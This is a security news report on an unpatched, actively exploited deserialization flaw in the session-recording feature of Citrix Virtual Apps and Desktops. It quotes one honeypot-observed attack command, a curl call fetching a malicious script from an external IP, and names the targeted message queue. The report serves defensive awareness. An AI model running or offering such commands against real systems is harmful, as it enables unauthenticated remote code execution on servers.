Citrix Virtual Apps & Desktops Zero-Day Actively Exploited

A critical unpatched vulnerability has been found in Citrix Virtual Apps and Desktops, now being actively exploited. The flaw, revealed by Watchtowr Labs, poses a significant risk, especially in remote work environments like call centers.

All about the Vulnerability

Citrix Virtual Apps and Desktops allow remote users to access full desktop environments from devices like laptops, tablets, and smartphones.

However, Watchtowr Labs warns that attackers, including ransomware groups, could exploit this setup. Since all desktops are hosted on a single server, a privilege escalation exploit could give attackers access to the entire server and all connected sessions.

A concerning issue with Citrix’s solution is its session recording feature. Citrix lets admins record user sessions, but the review process relies on a vulnerable .NET deserialization function.

This flaw can be exploited without authentication, making it an easy target for cybercriminals. Watchtowr Labs has posted proof-of-concept exploit code on GitHub, making it available to anyone.

Sample Exploit Details:
A recent exploit, reported by SANS, shows the severity of the vulnerability. In a honeypot, a POST request was made to a Citrix system, attempting to execute a command that fetched a malicious script from an external server. The exploit targeted Citrix’s messaging queue (msmq/private$/citrixsmaudeventdata) and tried to run the following command:

curl http://91.212.166.60/script_xen80-mix.php

Attempts to access the malicious script resulted in a 404 error, suggesting the attacker may be filtering requests by IP or collecting them for future attacks. The attack came from IP address 192.143.1.40, linked to an ISP in Johannesburg, South Africa.

The unpatched vulnerability in Citrix Virtual Apps and Desktops is a serious threat, as it allows remote command execution without authentication, potentially compromising entire systems. Since all desktops are hosted on the same server, gaining control of one session could lead to control of all connected sessions.

Citrix has not released a patch for this vulnerability, and affected organizations should remain alert. Watchtowr Labs advises monitoring for unusual activity, particularly from unknown IP addresses, and suggests implementing additional security measures to reduce the risk.